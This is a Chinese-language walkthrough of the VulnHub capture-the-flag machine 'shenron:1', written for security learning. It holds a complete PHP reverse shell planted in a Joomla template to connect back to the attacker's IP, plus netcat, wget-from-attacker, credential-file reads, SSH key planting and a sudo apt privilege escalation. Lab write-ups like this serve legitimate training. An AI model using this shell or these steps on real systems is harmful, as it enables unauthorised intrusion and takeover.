**声明:**文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究
靶机信息
下载地址:
https://www.vulnhub.com/entry/shenron-1,630/
靶场: VulnHub.com
靶机名称: shenron:1
难度: 简单-中等
发布时间: 2020年12月15日
提示信息:
无
目标: 2个flag
实验环境
攻击机:VMware kali 192.168.7.3
靶机:Vbox linux IP自动获取
信息收集
扫描主机
扫描局域网内的靶机IP地址
sudo nmap -sP 192.168.7.1/24
扫描到主机地址为192.168.7.173
扫描端口
扫描靶机开放的服务端口
sudo nmap -sC -sV -p- 192.168.7.173 -oN 1.nmap
扫描到2个开放端口
22:SSH
80:HTTP
Web渗透
http://192.168.7.173
首页是apache的默认页面,我们做个目录扫描
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.173 -x php,html,txt,zip
扫描到多个目录,我们逐一访问看看
http://192.168.7.173/test/
test目录下有一个password访问看看
http://192.168.7.173/test/password
提示这里有很多信息,看下源码
view-source:http://192.168.7.173/test/password
拿到一对帐号密码
admin:3iqtzi4RhkWANcu@$pa$$
继续看joomla页面
http://192.168.7.173/joomla/
访问后看到joomla的登录页面,joomla是一个cms程序,继续对joomla目录扫描,找一下后台登录地址
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.173/joomla -x php,html,txt,zip
找到后台管理目录adminostrator,用刚才获取的帐号密码登录进去
http://192.168.7.173/joomla/administrator/
登录成功,joomla这个cms是可以利用模板反弹shell的,我们来操作一下
joomla模板插入反弹shell
1.选择模板
2.选择模板
3.新建文件
4.将我们的反弹shell代码复制进去
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.69'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
OK,webshell已创建好,可以到kali攻击机下监听4444端口
nc -lvvp 4444
现在只需要访问我们创建好的shell.php即可反弹shell到攻击机上
http://192.168.7.173/joomla/templates/protostar/shell.php
反弹成功,切换到交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+a快捷键
stty -a
stty raw -echo;fg
reset
stty rows 34 columns 115
提权
主机信息收集
切换成功,找一找敏感信息吧
cat /var/www/html/joomla/configuration.php
获取到mysql密码
user = 'jenny'
password = 'Mypa$$wordi$notharD@123'
cat /etc/passwd
发现2个可登录的帐号,其中一个与mysql用户名相同,试试能不能用密码切换到jenny帐号
su jenny
输入密码Mypa$$wordi$notharD@123
切换成功,找找可提权的信息
sudo -l
CP提权
发现可以利用shenron身份复制文件,我们创建一个密钥复制到/home/shenron/.ssh
生成密钥
ssh-keygen
把id_rsa.pub复制一份到/tmp目录下名为authorized_keys
cp .ssh/id_rsa.pub /tmp/authorized_keys
将authorized_keys文件复制到/home/shenron/.ssh目录下
sudo -u shenron /usr/bin/cp /tmp/authorized_keys /home/shenron/.ssh/
复制成功,现在可以免密SSH登录了
ssh shenron@127.0.0.1
登录成功,查找下敏感信息
ls -al
cat local.txt
找到第1个flag:098bf43cc909e1f89bb4c910bd31e1d4,再找下提权信息
sudo -l
sudo -l需要密码,suid也没发现可提权的文件,上传个提权辅助脚本检测下
辅助提权脚本
脚本下载地址
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
将脚本下载到攻击机后,攻击机开启http服务
python3 -m http.server
靶机上下载
wget http://192.168.7.3:8000/lse.sh
给lse.sh文件加上执行权限,然后运行
chmod +x lse.sh
./lse.sh -l 1 -i
发现一个密码文件,查看下
cat /var/opt/password.txt
拿到shenron密码YoUkNowMyPaSsWoRdIsToStRoNgDeAr,查找下提权信息
sudo -l
输入密码YoUkNowMyPaSsWoRdIsToStRoNgDeAr
发现apt可以提权,查看下apt如何提权
https://gtfobins.github.io/gtfobins/apt/
知道如何提权了,验证一下
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh
提权成功,找下最后的flag
cd /root
ls
cat root.txt
拿到root.txt,游戏结束
这篇文章到这里就结束了,喜欢打靶的小伙伴可以关注"伏波路上学安全"微信公众号,或扫描下面二维码关注,我会持续更新打靶文章,让我们一起在打靶中学习进步吧.
